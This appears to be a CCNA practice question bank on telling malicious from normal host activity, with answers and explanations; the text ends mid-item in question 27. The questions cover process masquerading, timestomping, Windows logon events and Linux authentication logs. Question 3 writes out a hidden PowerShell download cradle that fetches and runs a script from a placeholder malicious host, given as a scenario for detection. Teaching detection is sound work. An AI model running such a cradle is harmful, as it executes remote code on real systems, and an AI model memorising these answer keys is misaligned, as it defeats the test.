Courseiva

CCNA Identification Of Malicious And Normal Activity Questions

43 questions · Identification Of Malicious And Normal Activity topic · All types, answers revealed

1
MCQeasy

An analyst reviewing a Windows workstation finds that the file C:\Windows\System32\drivers\etc\hosts has been modified and now contains several entries mapping well-known banking domains to 127.0.0.1. The file's LastWriteTime is two days ago, and no administrator has reported making the change. Which conclusion is MOST appropriate?

A.The modification indicates that the DNS Client service has been disabled on the host.
B.The modification is consistent with host-file redirection used to block or intercept traffic to specific domains and warrants further investigation.
C.The modification is benign because hosts-file changes are always performed by the user for ad-blocking purposes.
D.The modification is a normal Windows update behavior and should be ignored.
AnswerB

The hosts file is a common target for malware that redirects known domains to loopback or to attacker infrastructure to intercept or block traffic. Mapping banking domains to 127.0.0.1 is a classic pattern that prevents the real site from loading while potentially enabling credential theft via a local listener. The unexplained modification and recent timestamp justify immediate investigation.

Why this answer

Redirecting well-known banking domains to 127.0.0.1 through the hosts file is a recognized adversary technique for intercepting or blocking traffic, and the unexplained, recent modification makes it more suspicious. The appropriate response is to investigate the change, identify the process or account responsible, and examine the host for related indicators rather than dismissing it as routine or user-initiated.

Exam trap

The trap here is assuming any hosts-file edit is harmless user customization, when redirecting banking domains to loopback is a classic interception technique rather than ad-blocking.

2
MCQmedium

While reviewing a Windows host, you find a 4688 process creation event where the new process is C:\Windows\System32\svchost.exe but the parent process image is C:\Users\bob\AppData\Local\Temp\update.exe. The command line for svchost.exe contains -k netsvcs with no additional arguments. Which assessment is best supported?

A.The parent process path indicates a likely masquerading or code-injection event that warrants memory analysis of svchost.exe.
B.The command line is malformed and shows svchost.exe was invoked without the required -k service group.
C.The event is a false positive caused by Sysmon logging the wrong parent process for service hosts.
D.This is normal behavior because svchost.exe is frequently launched from user directories during updates.
AnswerA

The legitimate parent of svchost.exe is services.exe, so a user Temp directory parent is a strong indicator of process injection, hollowing, or a masquerading loader. The command line matches a valid service host invocation, which an attacker would copy to blend in. Capturing a memory image of the process and checking loaded modules and thread start addresses is the appropriate next step.

Why this answer

A user Temp directory as the parent of svchost.exe contradicts the normal services.exe parent-child relationship and points to injection or a masquerading loader. The correct-looking command line is part of the deception. Memory acquisition and module inspection of the process will confirm whether the service host is hosting malicious code.

Exam trap

The trap here is judging svchost.exe by its path and command line alone, when the parent process image is the artifact that exposes injection or masquerading.

3
MCQeasy

A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?

A.The scheduled task is using a PowerShell logging bypass to avoid detection, which is a common defense evasion technique.
B.The scheduled task is using a PowerShell profile script to maintain persistence, which is a common technique for surviving reboots.
C.The scheduled task is using a PowerShell download cradle to retrieve and execute a remote payload, which is a common fileless malware technique.
D.The scheduled task is using a PowerShell remoting command to execute a script on a remote system, which is a common lateral movement technique.
AnswerC

The command uses IEX (Invoke-Expression) to download and execute a PowerShell script from a remote URL. This is known as a download cradle and is a classic fileless malware technique because the payload is not written to disk. The use of -W Hidden and -Exec Bypass further indicates an attempt to evade detection. Scheduled tasks are often used for persistence.

Why this answer

The command uses Invoke-Expression to download and execute a PowerShell script from a remote URL, which is a download cradle. This allows the attacker to run arbitrary code without writing it to disk, making it fileless. The scheduled task provides persistence, running the command hourly as SYSTEM.

This combination is a common malware technique.

Exam trap

The trap here is focusing on the scheduled task or the PowerShell parameters as the primary technique, when the core malicious action is the download and in-memory execution of a remote payload via a download cradle.

4
MCQmedium

During an investigation of a compromised Windows 10 workstation, a forensic analyst reviews the NTFS $MFT and observes that the Standard Information Attribute (SIA) timestamps for a suspicious executable in C:\Windows\Temp are all identical, while the File Name Attribute (FNA) timestamps show a different, earlier date. The executable has no corresponding Prefetch file. Which conclusion is most strongly supported by these artifacts?

A.The file was created by a legitimate installer that preserved original timestamps, and the lack of Prefetch is due to a disabled SysMain service.
B.The file is encrypted by EFS, which alters $STANDARD_INFORMATION timestamps and prevents Prefetch creation until the file is decrypted.
C.The file is a legitimate Windows component that was moved from another volume, causing the SIA and FNA timestamps to diverge and Prefetch to be absent.
D.The file was likely placed by a tool that manipulated $STANDARD_INFORMATION timestamps to hinder timeline analysis, and it may not have been executed on this system.
AnswerD

Identical SIA timestamps combined with different FNA timestamps are a classic sign of timestomping, where an attacker sets $STANDARD_INFORMATION to a false date. The earlier FNA timestamps reflect when the file name was actually created. The absence of a Prefetch file further suggests the executable may not have run, or Prefetch was cleared, so the analyst cannot assume execution from these artifacts alone.

Why this answer

Identical $STANDARD_INFORMATION timestamps paired with differing $FILE_NAME timestamps indicate timestomping, because the SIA can be modified by user-mode APIs while the FNA is updated only by the kernel during file creation or rename. The absence of a Prefetch file means the analyst cannot confirm execution from these artifacts alone, and the file's location in C:\Windows\Temp further supports a malicious or suspicious origin rather than normal installation.

Exam trap

The trap here is assuming that identical SIA timestamps prove the file was executed, when they actually suggest timestamp manipulation and the lack of Prefetch means execution is unconfirmed.

5
MCQmedium

During an investigation of a Windows Server 2019 host, you review the Security event log and find Event ID 4624 entries with Logon Type 3 originating from a workstation subnet that should never authenticate to this server. The associated 4672 entry shows SeDebugPrivilege assigned to the resulting token. The account name is a normal helpdesk user. Which conclusion is most defensible from these artifacts alone?

A.The server was rebooted and the helpdesk account was used as a service account during startup.
B.The helpdesk account authenticated over the network and received administrator-level privileges in that session.
C.The helpdesk account performed an interactive RDP session to the server from the workstation subnet.
D.The account was used to start a scheduled task on the server, which explains the privileged token.
AnswerB

Logon Type 3 confirms a network authentication (SMB, WMI, or similar), and Event 4672 is logged when a logon is assigned special privileges, here SeDebugPrivilege. The combination of an unexpected source subnet, a non-admin account name, and administrator-equivalent privileges indicates the account is being used with elevated rights from an unauthorized location, which warrants pivoting to the source host for further evidence.

Why this answer

A Logon Type 3 combined with Event 4672 indicates a network authentication that received special privileges, which is the classic signature of remote administrative access using a nominally low-privilege account. The unauthorized source subnet makes this more suspicious rather than less. Investigators should follow the source IP back to the originating host and check for credential theft or lateral movement tooling there.

Exam trap

The trap here is assuming any 4672 event means the account is an administrator, when 4672 only shows privileges were assigned to the logon token, and the logon type still governs how the session began.

6
MCQeasy

When reviewing firewall logs, what activity should be flagged as an immediate indicator of a potential port scan?

A.Multiple successful inbound connections to port 80.
B.A high frequency of connection attempts from one source to many destination ports.
C.A single connection to a database port from an internal host.
D.Periodic outbound traffic to a known DNS server.
AnswerB

Systematic probes across a large range of ports from a single source are the primary indicator of a port scan. Security analysts use this pattern to identify reconnaissance efforts, allowing them to block the offending IP address before the attacker can identify and exploit vulnerable services on the network.

Why this answer

A port scan involves a single source IP attempting to connect to a large range of destination ports in a short timeframe. Firewall logs showing a spike in 'Denied' or 'Dropped' connection attempts from one host to many different targets is a classic signature. Identifying this helps analysts catch reconnaissance activity early before the attacker transitions to active exploitation of a specific vulnerable service.

Exam trap

Test-takers sometimes mistake high-volume traffic to a single destination port for a port scan, missing the core definition of scanning multiple ports.

7
MCQmedium

During an intrusion investigation on a Windows 10 workstation, an analyst observes that several user-mode processes have established TCP connections to 203.0.113.45:443. The analyst wants to determine which executable image on disk was responsible for the network activity and whether the process is still running. Which artifact provides the most direct evidence by mapping a live network connection to its owning process executable path?

A.Security event log 5156 (Windows Filtering Platform permitted a connection) filtered by destination IP
B.Sysmon Event ID 3 (Network connection detected) with the Image and DestinationIp fields
C.Windows Firewall log entries recording allowed outbound connections to the remote IP
D.Netstat output showing the PID and remote address, correlated with Task Manager
AnswerB

Sysmon Event ID 3 records network connection events and includes the Image field (full path of the process executable) along with source/destination IP and port. This directly answers which executable initiated the connection to 203.0.113.45:443. If configured with adequate filtering, it captures this even when the process is short-lived, making it the most direct artifact for correlating a connection with an on-disk executable.

Why this answer

Sysmon Event ID 3 is specifically designed to log network connection events and includes the full image path of the process that initiated the connection, along with source and destination IP/port. This allows an analyst to definitively map a connection to an executable on disk and determine if that process was running at the time of the event. Other artifacts either lack process attribution, are non-persistent, or do not record the executable path in a usable form for this correlation.

Exam trap

The trap here is assuming that any log showing a connection to the suspicious IP automatically identifies the responsible executable, when in fact only artifacts that include the process image path provide that attribution.

8
Multi-Selectmedium

Which TWO of the following behaviors are common indicators of fileless malware execution that a forensic analyst should look for in memory artifacts?

Select 2 answers
A.Creation of an autorun registry key pointing to a hidden .exe file.
B.Evidence of PowerShell execution using the -EncodedCommand flag.
C.Injected code found within the memory space of a legitimate process.
D.Large volume of deleted files recovered from the $MFT.
E.High frequency of DLL load events from the C:\Windows\Temp directory.
AnswersB, C

Using -EncodedCommand is a classic tactic to hide malicious PowerShell logic from simple string-based logging. Forensic analysts frequently encounter this in fileless attacks, where the script is base64-encoded and passed directly into memory, leaving no direct trace of the script file on the local file system.

Why this answer

Fileless malware operates by residing in volatile memory rather than writing traditional binaries to the disk. Analysts must focus on process memory injection, anomalous script execution, and reflective DLL loading. Detecting these requires memory forensics tools to extract and analyze injected code segments or PowerShell command history.

This is critical because attackers increasingly use living-off-the-land techniques to evade signature-based antivirus solutions that primarily scan files on disk.

Exam trap

Students often look for traditional executable files on the disk, failing to select memory-based indicators like encoded PowerShell commands and injected process code.

9
MCQhard

A forensic analyst is analyzing a Windows 10 memory image and finds a process named 'svchost.exe' with PID 4567. The process's parent is 'services.exe', but its executable path is C:\Users\Public\svchost.exe. The analyst also notices that the process has a network connection to an external IP on port 443. Which of the following is the most likely explanation for this finding?

A.The process is a legitimate svchost.exe that has been compromised via DLL hijacking, causing it to load a malicious DLL from the user directory.
B.The process is a legitimate svchost.exe that has been migrated to a user directory by Windows Update as part of a rollback operation.
C.The process is a malicious executable masquerading as svchost.exe, using a legitimate parent process name and an external network connection for command and control.
D.The process is a legitimate svchost.exe instance that has been moved to a user directory by a system administrator for troubleshooting.
AnswerC

Malware often names itself svchost.exe and places itself in user-writable directories like C:\Users\Public to appear legitimate. The parent being services.exe is likely spoofed or the malware was injected into a legitimate svchost process. The external connection on port 443 suggests command and control. This is a classic masquerading technique.

Why this answer

A process named svchost.exe running from C:\Users\Public with a parent of services.exe and an external network connection is a classic sign of malware masquerading as a legitimate system process. The executable path is the key indicator, as legitimate svchost.exe runs from System32. The external connection suggests command and control.

Exam trap

The trap here is trusting the process name and parent process, which can be spoofed, instead of verifying the executable path and network behavior, which are more reliable indicators of malicious activity.

10
MCQmedium

During a live response on a Windows 10 workstation, you observe a process named 'lsass.exe' with PID 672. Its parent process is 'winlogon.exe' (PID 596), and its executable path is 'C:\Windows\System32\lsass.exe'. However, the process has an open handle to a suspicious named pipe '\\.\pipe\evil'. Based on this evidence, what is the most likely explanation?

A.The named pipe is a standard Windows component used for local security authority communication and is not suspicious.
B.The process is a legitimate lsass.exe that has been compromised via a DLL injection or reflective loading technique.
C.The process is a masquerading executable placed in the System32 directory by an attacker.
D.The process is a child of winlogon.exe, which indicates it is a normal system process and the pipe handle is irrelevant.
AnswerB

A legitimate lsass.exe should not have handles to arbitrary named pipes unless they are part of normal system operation. The presence of an unusual named pipe like 'evil' suggests code injection or a malicious module loaded into the process, allowing an attacker to communicate with it. This is consistent with credential dumping or persistence mechanisms.

Why this answer

The correct answer identifies that a legitimate lsass.exe with an unusual named pipe handle suggests compromise through injection or reflective loading. The process path and parent are normal, so the anomaly is the pipe, which is not part of standard lsass behavior. This indicates malicious code running within a trusted process.

Exam trap

The trap here is assuming that because the process path and parent are correct, the process is entirely benign, ignoring the suspicious named pipe handle.

11
MCQeasy

A forensic analyst is reviewing a compromised Windows 10 host and finds a file named 'lsass.exe' in the C:\Windows\Temp directory. The file has a creation timestamp that coincides with the suspected intrusion time. The analyst wants to determine if this file is a malicious copy of the legitimate Windows process. Which characteristic of the legitimate lsass.exe should the analyst verify first to confirm the file is suspicious?

A.The file's digital signature and its original location in C:\Windows\System32
B.The file's hash against a threat intelligence database like VirusTotal
C.The file's access control list (ACL) to see if permissions were modified
D.The file's size and version information compared to the known-good lsass.exe
AnswerA

The legitimate lsass.exe resides in C:\Windows\System32 and is digitally signed by Microsoft. A copy in C:\Windows\Temp is highly suspicious because system processes do not normally run from temporary directories. Verifying the digital signature and original location quickly confirms whether the file is the genuine Windows component or a masquerading malicious binary, making this the most direct first check.

Why this answer

Legitimate Windows system executables like lsass.exe are stored in C:\Windows\System32 and are digitally signed by Microsoft. A copy found in C:\Windows\Temp is almost certainly malicious or a decoy. Verifying the digital signature and original location is a quick, offline method to confirm the file is not the genuine system process.

Other checks like hash lookups or ACL review are useful but less immediate and definitive for this specific masquerading scenario.

Exam trap

The trap here is relying on file size or hash lookups first, when the most obvious indicator is the unexpected directory combined with an invalid or missing Microsoft signature.

12
MCQhard

You are examining a Windows 10 host and find a scheduled task whose XML action launches 'rundll32.exe' with the argument 'C:\ProgramData\Microsoft\Crypto\RSA\logon.dll,Register'. The task's author is a domain user who has never logged on to this machine, and the DLL has a creation timestamp matching the suspected intrusion window. Which assessment is best supported?

A.This is a benign logon script registered by Group Policy for the domain user.
B.This indicates a misconfigured application installer that ran as the wrong domain account.
C.This is a legitimate Windows cryptographic component and should be excluded from the investigation.
D.This is a persistence mechanism using a masqueraded path and an export invoked via rundll32.
AnswerD

Attackers frequently place DLLs in plausible-looking system directories and register them through rundll32 by export name so the payload executes inside a signed Microsoft binary. The author being a domain user who never logged on locally, combined with the DLL creation time matching the intrusion window, strongly supports a persistence mechanism rather than legitimate software installation.

Why this answer

Scheduled tasks that invoke rundll32 against a DLL export located in a user-writable directory are a well-known persistence technique because the signed Microsoft binary performs the loading and evades naive process-name detection. The combination of an author account with no local logon history and a DLL creation timestamp inside the intrusion window confirms this is attacker-planted rather than legitimate cryptographic or installer activity.

Exam trap

The trap here is seeing the word 'Crypto' in the path and assuming the DLL is a legitimate Windows cryptographic component, when the path is only a plausible-looking masquerade.

13
MCQmedium

Which indicator is most effective for identifying a 'Golden Ticket' attack during Kerberos-based authentication?

A.Unusually long ticket lifetimes in the Kerberos ticket history.
B.Multiple failed login attempts on a workstation.
C.An increase in web traffic on port 443.
D.The presence of a new user account in Active Directory.
AnswerA

Golden Tickets are often created with extremely long expiration times, sometimes years into the future. Monitoring ticket lifetimes is a highly effective way to identify forged TGTs, as standard Kerberos tickets have strictly enforced, short lifetimes defined by domain policies that a forged ticket would likely bypass or violate.

Why this answer

A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) created with a compromised KRBTGT account hash. Because it is forged, it can grant the attacker unlimited access to any resource in the domain for long periods. Identifying this requires looking for tickets with unusually long lifetimes, or tickets that do not match the standard issuance patterns expected from the domain controller's authentication logs during normal operations.

Exam trap

Candidates look for account lockouts or failed logins, which are not characteristic of Golden Tickets. Golden Tickets use forged credentials, so they appear as legitimate, highly privileged, and persistent authentication.

14
MCQmedium

An analyst is examining a Linux server that is suspected of being compromised. The analyst runs 'netstat -anp' and observes a process named 'kworker' with PID 1234 listening on TCP port 4444. The analyst knows that legitimate kworker processes are kernel threads and do not open network sockets. Which of the following conclusions is most appropriate?

A.The process is a legitimate kworker that is part of a user-space threading library, which can create network sockets for inter-process communication.
B.The process is a legitimate kworker that has been infected by a rootkit, so the network socket is actually owned by a hidden malicious process.
C.The process is a legitimate kernel worker that has been temporarily repurposed by the system for network load balancing.
D.The process is likely a malicious backdoor masquerading as a kernel thread, and further analysis should include checking its executable path and parent process.
AnswerD

Attackers often name malicious processes to mimic legitimate system processes like kworker to avoid detection. A kworker process listening on a port is a strong indicator of a backdoor. The analyst should use tools like 'ls -l /proc/1234/exe' to find the executable and 'ps -fp 1234' to see the parent, which can reveal the malware's origin.

Why this answer

A process named kworker listening on a network port is anomalous because legitimate kworker threads are kernel threads and do not open sockets. This strongly suggests a malicious process masquerading as a kernel thread. The analyst should investigate the executable path and parent process to confirm and identify the malware.

Exam trap

The trap here is assuming that because the process name matches a legitimate kernel thread, it must be benign, ignoring the fact that kernel threads never listen on network ports.

15
MCQmedium

An analyst is examining a Linux server suspected of compromise. In /var/log/auth.log, they observe repeated entries of the form: 'sshd[1234]: Accepted publickey for deploy from 10.20.30.40 port 51515 ssh2: RSA SHA256:...' followed by 'sshd[1234]: pam_unix(sshd:session): session opened for user deploy'. No corresponding 'Failed password' entries appear for that source IP. Which interpretation is MOST accurate?

A.The session was established using a valid SSH public key, indicating successful key-based authentication from 10.20.30.40.
B.The session was established through a brute-force password attack that succeeded after many failures.
C.The session was established through a reverse shell initiated by a malicious payload on the server.
D.The session was established through SSH agent forwarding from an untrusted host, which is why no password prompt was logged.
AnswerA

The 'Accepted publickey' message and the RSA SHA256 fingerprint confirm that SSH key-based authentication succeeded. The subsequent PAM session-open entry confirms a shell or session was established. With no preceding failed password attempts from that IP, this pattern is consistent with legitimate key-based access — though the analyst should still verify the key belongs to the expected user and that the source IP is trusted.

Why this answer

The 'Accepted publickey' line with an RSA SHA256 fingerprint shows sshd validated the client's key, and the subsequent pam_unix session-open confirms a login session. The absence of prior 'Failed password' entries from that IP rules out a brute-force narrative. Key-based access is the correct interpretation, subject to verifying the key's ownership and the trustworthiness of the source address.

Exam trap

The trap here is confusing the absence of a password prompt with suspicious behavior, when 'Accepted publickey' is the explicit sshd log marker for successful key-based authentication.

16
MCQmedium

An analyst observes PowerShell usage with the encoded command flag '-e'. What is the standard forensic approach to de-obfuscate and analyze this activity?

A.Run the script directly in a production environment to see its effect.
B.Use a base64 decoder to convert the command string to plaintext.
C.Search for the command in the Windows Update history.
D.Check the local BIOS/UEFI logs for the command execution.
AnswerB

Decoding the base64 string reveals the original PowerShell code, which is essential for understanding the intended actions. This allows the analyst to identify malicious logic, such as network connections or file system changes, that the attacker was attempting to hide from traditional security monitoring tools and administrative logs.

Why this answer

Base64 encoded PowerShell commands are a common tactic to bypass signature-based detection. The analyst must extract the encoded string, decode it using standard utilities like CyberChef or PowerShell itself, and then perform static analysis on the resulting script. This process is vital to understand the attacker's intent, such as identifying hidden C2 downloaders, persistence scripts, or data collection commands that were otherwise obscured from basic text-based log searches.

Exam trap

Candidates frequently try to read encoded PowerShell command strings manually without decoding the Base64 payload first, wasting time on obfuscated syntax.

17
MCQeasy

While triaging a Linux web server, you find that '/usr/bin/sshd' was executed but the running process's parent is 'bash' rather than the systemd service manager, and the process has no associated listening socket. Which conclusion is best supported?

A.An attacker renamed a malicious binary to 'sshd' to blend in with legitimate processes.
B.The sshd binary was updated by the package manager during an unattended upgrade.
C.The sshd process is a legitimate child spawned by a user's SSH session.
D.The system experienced a crash and systemd restarted sshd through a recovery shell.
AnswerA

Legitimate sshd is spawned by systemd and immediately opens its listening socket on port 22. A process named sshd but parented by bash and holding no listener was almost certainly started manually by an interactive shell, which is the hallmark of an attacker renaming a tool to masquerade as a system daemon while it performs other actions such as beaconing or credential collection.

Why this answer

On Linux, parent process and socket state are strong discriminators of legitimacy. A real sshd is started by systemd, which makes PID 1 its parent, and it binds port 22. A process carrying the sshd name but parented by bash and holding no listening socket could not be performing the SSH service role, so the most supportable conclusion is that a binary was renamed to mimic sshd.

Exam trap

The trap here is trusting the process name alone, when on Linux the parent PID and bound sockets are what distinguish a real daemon from a masqueraded binary.

18
MCQmedium

Which forensic artifact is most useful for determining if a user has recently opened a specific suspicious file, even if that file has since been deleted?

A.The Windows Registry SAM hive.
B.Windows LNK files and Jump Lists.
C.System event logs (Event ID 7045).
D.The browser cache database.
AnswerB

LNK files and Jump Lists are specifically designed to track recent user activity. They record the path, access time, and volume information for files opened by the user. These artifacts remain on the system after the source file is deleted, making them invaluable for reconstructing past user behavior during an investigation.

Why this answer

Shell items, specifically LNK files and Jump Lists, maintain metadata about user file interactions. When a user opens a file, the OS creates these artifacts, which persist even if the target file is removed. This makes them essential for identifying user intent and proving that a malicious file was not only present but was actively accessed by the user, providing critical evidence for attribution.

Exam trap

Candidates often confuse LNK files with registry keys or general prefetch files, failing to recognize that shell items specifically track direct user interactions and file paths even after target deletion.

19
Multi-Selecthard

Which THREE of the following are considered 'living-off-the-land' (LotL) techniques used by attackers to avoid detection?

Select 3 answers
A.Utilizing WMI (Windows Management Instrumentation) to execute remote commands.
B.Installing a custom kernel-mode rootkit for persistence.
C.Using Bitsadmin to download external payloads.
D.Executing scripts via PowerShell to gather system information.
E.Running a custom C++ backdoor compiled on the target.
AnswersA, C, D

WMI is a powerful administrative framework that is frequently abused for remote code execution and lateral movement. Because WMI operations are essential for system management, they often blend in with normal administrative traffic, allowing attackers to maintain persistence and control without installing custom, easily detectable malware binaries.

Why this answer

LotL techniques leverage legitimate, pre-installed administrative tools to perform malicious actions. Because these binaries are signed and expected to be present in the environment, traditional endpoint protection often ignores them. Attackers use these tools for discovery, lateral movement, and execution, effectively hiding their activity in the noise of normal system administration tasks, which makes them highly effective for stealthy operations within a compromised network.

Exam trap

Candidates often include non-LotL tools like custom malware or unauthorized hacking tools. LotL specifically refers to using pre-installed, trusted system binaries like PowerShell, WMI, or Bitsadmin for malicious purposes.

20
Multi-Selecthard

A forensic analyst is investigating a Windows workstation that is suspected of being compromised by a fileless malware attack. The analyst has acquired a memory image and a disk image. Which TWO of the following artifacts, when analyzed together, would provide the strongest evidence that a fileless attack has occurred and is currently active? (Choose two.)

Select 2 answers
A.PowerShell operational log event ID 4104 containing an encoded script that decodes to a reflective loader
B.Injected code in the memory of a legitimate process, such as explorer.exe, visible through memory forensics
C.An entry in the ShimCache (AppCompatCache) for a malicious binary
D.A newly created service with a binary path pointing to a suspicious executable in C:\Windows\Temp
E.A prefetch file for a known malicious executable on disk
AnswersA, B

Event ID 4104 captures script block content, and an encoded script that decodes to a reflective loader is a classic fileless technique. Reflective loaders execute code directly in memory without writing to disk. This artifact provides evidence of the initial execution vector and the malicious payload, and when combined with memory injection evidence, strongly confirms an active fileless attack.

Why this answer

Fileless malware operates by injecting code into memory and often uses scripts like PowerShell to load payloads reflectively without writing executables to disk. Finding injected code in a legitimate process's memory via memory forensics, combined with a PowerShell script block log showing an encoded reflective loader, provides strong evidence of an active fileless attack. The other artifacts—prefetch, service creation with a binary, and ShimCache—all indicate disk-based execution, which is inconsistent with a fileless attack.

Exam trap

The trap here is selecting artifacts that show any malicious activity, such as prefetch or ShimCache, without considering that fileless attacks specifically avoid leaving such disk-based traces.

21
MCQmedium

An analyst reviewing Windows event logs on a compromised workstation discovers a sudden spike in Event ID 4624 with Logon Type 3, followed immediately by Event ID 4672. The source IP address belongs to a non-routable internal subnet. Which forensic interpretation best explains this activity?

A.An interactive user logged into the local console, triggering default privilege escalation assignments.
B.A scheduled batch job executed locally using stored credentials without generating network authentication traffic.
C.An adversary performed lateral movement using stolen administrative credentials over the network to access administrative shares.
D.A service account automatically restarted following a system crash, initiating local service control manager requests.
AnswerC

Logon Type 3 signifies a network authentication session, and Event ID 4672 explicitly records the assignment of special privileges to new logon sessions. Attackers routinely leverage network shares and administrative credentials to pivot across internal enterprise endpoints seamlessly.

Why this answer

This specific sequence indicates a network logon successfully authenticating an administrative user, frequently observed during lateral movement via SMB or PsExec. Understanding this pattern allows analysts to differentiate authorized administrative maintenance from credential-based attacks, mapping directly to attacker tactics in enterprise environments.

Exam trap

Candidates often misinterpret internal non-routable subnet traffic as benign local communication, ignoring the significance of Logon Type 3 followed immediately by Event ID 4672.

22
MCQmedium

During a compromise assessment on a Windows 10 workstation, an analyst runs a volatile memory capture and inspects the process list in Volatility 3. The analyst observes a process named 'lsass.exe' with PID 872, whose parent process is 'winlogon.exe' with PID 640. The executable path recorded for lsass.exe is 'C:\Windows\System32\lsass.exe'. Which conclusion is BEST supported by these artifacts?

A.The lsass.exe process is a masquerading implant because its parent should always be services.exe.
B.The lsass.exe process has been injected with a credential-dumping payload because its PID is not a multiple of four.
C.The lsass.exe process must have been relocated from its original directory because the System32 copy is reserved for svchost.exe.
D.The lsass.exe process appears consistent with a normal Windows host; the parent and image path match expected behavior.
AnswerD

Both the parent process (winlogon.exe) and the image path (C:\Windows\System32\lsass.exe) match the expected configuration for LSASS on a Windows 10 workstation. A masquerading lsass.exe would typically show a non-system path or an unexpected parent. These artifacts therefore support a benign classification, though corroborating evidence such as digital signature or handle analysis should still be reviewed.

Why this answer

Legitimate LSASS on Windows is launched by winlogon.exe from C:\Windows\System32\lsass.exe, and the captured parent-child relationship and image path both match that baseline. Because neither attribute deviates from expected behavior, the artifacts support a normal-host classification. Analysts should still corroborate with signature and handle inspection, but these particular memory artifacts do not indicate compromise.

Exam trap

The trap here is assuming that any lsass.exe parent other than services.exe indicates masquerading, when in fact winlogon.exe is the expected parent on a Windows workstation.

23
MCQhard

You are reviewing a Windows Server 2019 Security event log and find Event ID 4624 with Logon Type 3 and the 'NTLM' authentication package for a service account, occurring at 02:14 from a workstation that has no corresponding 4648 or 4672 events. Which interpretation is most forensically sound?

A.This is normal service account behavior and no further review is needed.
B.This proves credential theft via Pass-the-Hash against the service account.
C.This is a network logon using NTLM that warrants correlation with source host and account baseline.
D.This indicates a successful interactive console logon by an attacker.
AnswerC

Logon Type 3 with the NTLM package means the credentials were presented over the network rather than interactively, and the absence of 4672 special-privilege assignment or 4648 explicit-credential use suggests a straightforward authenticated network access. Because NTLM bypasses Kerberos policy controls, the record must be correlated with the account's normal source hosts to determine whether the authentication is anomalous.

Why this answer

Logon Type 3 identifies a network logon, and the NTLM authentication package means the session did not use Kerberos. That alone is not proof of compromise, but it is a meaningful indicator that must be baselined against the account's normal source hosts, logon patterns, and downstream privilege events before any conclusion about credential theft or lateral movement is drawn.

Exam trap

The trap here is treating Logon Type 3 with NTLM as automatic proof of Pass-the-Hash, when it is only a network authentication that requires corroborating evidence.

24
MCQhard

A forensic analyst is examining a Windows Server 2016 system that is suspected of being compromised. The analyst runs 'wevtutil qe Security /f:text /q:"*[System[(EventID=4688)]]"' and notices that many process creation events have the 'Subject Logon ID' field set to '0x3e7'. Which of the following best describes the significance of this finding?

A.The processes were created by the SYSTEM account, which often indicates that a service or scheduled task spawned them; this could be normal or malicious depending on the process.
B.The processes were created by a user who logged on interactively, as indicated by the logon ID starting with 0x3, which denotes interactive logons.
C.The processes were created by a user with a randomly assigned logon ID, which suggests the system is using logon session isolation for security.
D.The processes were created by a user with a well-known logon ID, which is typical for system services and indicates no malicious activity.
AnswerA

Logon ID 0x3e7 is the well-known logon ID for the SYSTEM account (NT AUTHORITY\SYSTEM). Processes with this logon ID are typically spawned by services, scheduled tasks, or other SYSTEM-level components. While this is normal for many system processes, attackers who gain SYSTEM privileges will also generate events with this logon ID. Therefore, the analyst must correlate the process name and command line to determine if it is suspicious.

Why this answer

The logon ID 0x3e7 is a well-known identifier for the SYSTEM account in Windows. Process creation events with this logon ID indicate that the process was spawned under the SYSTEM context, which is common for services and scheduled tasks. However, because attackers often escalate to SYSTEM, the analyst must examine the process name, command line, and parent process to determine if the activity is malicious.

The logon ID alone is not sufficient to declare benign or malicious.

Exam trap

The trap here is assuming that any process with logon ID 0x3e7 is automatically benign because it is SYSTEM, when in fact attackers frequently operate under SYSTEM and such events require deeper scrutiny.

25
MCQmedium

An analyst identifies a process performing unexpected DNS queries to a top-level domain ending in .xyz every 60 seconds. What is the most effective initial host-based action to confirm malicious beaconing?

A.Perform a full disk imaging of the host immediately.
B.Execute an immediate reboot of the affected system.
C.Correlate the DNS query timestamps with socket ownership via netstat or EDR telemetry.
D.Flush the local DNS resolver cache on the host.
AnswerC

Mapping process IDs to remote network connections provides definitive proof of which executable is responsible for the beaconing. By comparing the process creation time and the socket initiation time, the analyst can identify the specific binary responsible for the traffic, which is a foundational step in host-based incident response.

Why this answer

Isolating the process behavior through network connection correlation allows the analyst to map the C2 traffic to a specific binary. Identifying the parent process and local socket ownership is essential to distinguish between legitimate background tasks and automated beaconing activity. This helps narrow the scope of the investigation by confirming the persistence mechanism and the specific threat actor communication pattern associated with the compromised host.

Exam trap

Candidates frequently jump to conclusions by analyzing DNS queries in isolation without correlating them with actual socket ownership or local process execution on the host.

26
MCQhard

Refer to the exhibit. An analyst observes this process execution on a domain controller. What indicator suggests this activity is likely malicious?

A.The process is running as NT AUTHORITY\SYSTEM.
B.The parent process is services.exe.
C.The process is establishing an outbound connection to an external IP address.
D.The process is using a high-numbered ephemeral port.
AnswerC

Domain controllers should have strictly controlled outbound traffic profiles. An established connection to an arbitrary external IP address from a core infrastructure process like svchost is a classic indicator of compromise, suggesting the system is acting as a pivot or is participating in a command-and-control communication channel.

Why this answer

While svchost.exe is a legitimate Windows service host, the network connection originating from a domain controller to an external IP address is highly suspicious. Legitimate domain controller service traffic should be directed towards internal domain members or approved update servers. This specific pattern, combined with the process context, indicates potential lateral movement or data exfiltration attempts using a masqueraded system process to bypass basic security controls.

Exam trap

Examinees often assume processes named svchost.exe are automatically safe even when running on a domain controller with anomalous network destinations.

27
MCQhard

You are analyzing a Linux web server and find that /var/log/auth.log contains many 'Failed password' entries followed by a single 'Accepted password' for the account 'deploy' from the same source IP. Shortly after, you see a sudo command adding a new user named 'support' to the sudoers file. Which sequence best describes what occurred?

A.A legitimate administrator mistyped the password several times and then correctly added a new support user.
B.The deploy account was used by an automated deployment tool that periodically re-authenticates and updates sudoers.
C.The server experienced a PAM misconfiguration that logged failed attempts while still allowing the successful login.
D.A brute-force password attack succeeded against the deploy account, and the attacker then escalated privileges via sudo.
AnswerD

The repeated failures followed by a success from the same source IP describe a successful brute-force or password-guessing attack. The subsequent sudo invocation that adds a user to sudoers is a classic privilege escalation and persistence step, since it creates a second account with administrative rights. Both events, tied to the same session, form a coherent intrusion chain.

Why this answer

The sequence of many failed password attempts ending in one success from the same IP shows a successful credential-guessing attack. The immediate sudo action that adds a new sudoer account indicates the attacker established persistence and elevated access. Investigators should trace the source IP, review command history and auth logs for the session, and check for additional accounts or scheduled jobs created by the attacker.

Exam trap

